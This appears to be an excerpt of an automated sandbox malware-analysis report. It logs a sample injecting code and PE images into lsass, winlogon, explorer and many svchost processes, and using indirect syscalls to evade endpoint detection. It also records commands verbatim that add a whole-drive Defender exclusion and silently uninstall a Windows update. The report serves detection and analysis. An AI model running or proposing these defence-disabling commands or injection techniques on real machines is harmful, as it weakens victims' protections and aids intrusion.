        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1A2D60F0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1BE50BD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\Runtimeuserer.exe base: 1944DB10000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25AC2E80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E0CBC50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D75A900000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 16C61B10000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1B4127C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 240B71D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20D72E80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20D73110000 protect: page execute and read and write
        Contains functionality to inject code into remote processes
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,29_2_0000000140001C88
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 5FF9273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C734273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B91B273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: 91CF273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2E96273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B8D7273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 56DC273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9CCD273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: BAC0273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9C9D273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 180273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2B23273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 2759273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 9BDC273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 98F6273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: CD78273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D2B8273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C133273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A409273C
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F61C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 112C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B1D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 12F6273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 115C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B469273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9EBD273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C668273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 905C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5A8E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC5B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA18273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9618273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D0B5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5532273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9582273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5466273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8309273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DB1C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CACC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6DEC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1CA273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E227273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1BED273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FF34273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8792273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CCCC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61F2273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EEB3273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 637D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 89B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1CC8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C6EF273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6318273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4B67273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9B3B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 30FF273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E5E0273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3540273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 916A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C40A273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8FD8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 81D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E3AC273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A8F8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1579273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D0E273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7E3B273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 693C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D60F273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 50BD273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB1273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C2E8273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CBC5273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5A90273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61B1273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 127C273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B71D273C
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 72E8273C
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\AppData\Roaming\LB31.exeNtQueryInformationProcess: Indirect: 0x7FF7E78BA315Jump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF6FDA5A315
        Source: C:\Users\user\AppData\Roaming\LB31.exeNtQuerySystemInformation: Indirect: 0x7FF7E7886D37Jump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF6FDA52108
        Source: C:\Users\user\AppData\Roaming\LB31.exeNtQuerySystemInformation: Indirect: 0x7FF7E78B2108Jump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF6FDA5A43D
        Source: C:\Users\user\AppData\Roaming\LB31.exeNtQueryInformationProcess: Indirect: 0x7FF7E78BA43DJump to behavior
        Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF6FDA26D37
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 21091CF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24ED0B50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20955320000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22687920000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 89B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115790000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1A2D60F0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BE50BD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1944DB10000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25AC2E80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E0CBC50000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D75A900000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 16C61B10000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1B4127C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 240B71D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20D72E80000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20D73110000 value starts with: 4D5A
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 3968 base: 89B0000 value: 4D
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\AppData\Roaming\LB31.exeThread register set: target process: 2988Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 161C7340000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 233B91B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 21091CF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2062E960000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282B8D70000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22856DC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207BAC00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27A01800000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2992B230000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23227590000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28098F60000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23ACD780000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1C1330000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192A4090000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5112C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2848B1D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A12F60000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8115C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C8B4690000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 213C6680000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: B80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25B905C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2905A8E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A5FA180000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19296180000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24ED0B50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20955320000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B054660000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15D00D80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20983090000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 278CACC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAE2270000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 284FF340000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22687920000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B661F20000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD637D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 89B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2081CC80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23263180000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2064B670000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F535400000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 149A8F80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115790000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1A2D60F0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1BE50BD0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\Runtimeuserer.exe base: 1944DB10000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25AC2E80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E0CBC50000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D75A900000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 16C61B10000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1B4127C0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 240B71D0000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20D72E80000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20D73110000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB31.exe "C:\Users\user\AppData\Roaming\LB31.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
